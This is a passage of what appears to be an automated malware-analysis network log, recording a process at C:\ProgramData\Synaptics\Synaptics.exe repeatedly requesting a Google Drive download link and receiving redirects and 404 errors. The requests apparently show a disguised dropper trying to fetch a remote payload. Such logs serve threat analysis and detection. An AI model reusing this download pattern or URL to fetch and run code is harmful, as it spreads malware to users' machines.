                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:26 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-PaYn2esPOg2oPD55cvDejg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:26 UTC | 147 | IN
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:26 UTC | 1390 | IN
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="6ESI33NHA9euU7i4Fpjo0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:26 UTC | 115 | IN
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.8 | 49808 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:26 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:26 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-BZ7RW_abi7tbnzNMDj5f0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.8 | 49806 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:26 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:26 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-iQTjCpLifis_gxfmykjoeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.8 | 49811 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:26 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:27 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4Pnzw6IC7dQs6vccov--bdohDXjI6ahqHo4iIAECQWQDH7SsAryJ2e9JOZtoQMKM7tywkr_7E
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:27 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-zzya00Vx86yFFFlw9_LHng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:27 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:27 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="338lu4g907VczKkP57nZVw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:27 UTC  122                IN         Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                            Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                            59          192.168.2.8  49812        142.250.185.78   443               7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:27 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                            60          192.168.2.8  49814        142.250.185.78   443               7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:27 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                            61          192.168.2.8  49813        142.250.185.161  443               7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:27 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                            62          192.168.2.8  49816        142.250.185.78   443               7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:28 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:28 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:28 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-dVWEwA6yaYCznEPQ2dfPow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                            63          192.168.2.8  49817        142.250.185.78   443               7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:28 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:28 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:28 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-e2xqQAjGVGIc5JYkiN0ObA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                            64          192.168.2.8  49822        142.250.185.161  443               7732  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                            2024-12-30 10:49:29 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:29 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5xbHscZhjUAC5j9kAMvQaUCXa-3yfOu7RaoYqljKYV8knjX56L1UvKEB0C5Fc9Tu4Pc4Tj0sg
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:29 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Z6jKdYZQNpTihdvOzfobAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:29 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:29 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="ozVq4XidKhkuTNxCSLh7Ew">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:29 UTC  122                IN         Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.8 | 49819 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:29 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:29 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ckpieVmGDIy4SdRNgHWn3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.8 | 49820 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:29 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:30 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC53D40FV8zy2Uy0FzXv9g0PLku9ZgXhSCoSOwYRHj6iQ0S7pzTcBVIUnucULY9BCseABGfGTAA
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:29 GMT
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-3a8-nsDvDMxdsNONszcB0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:30 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
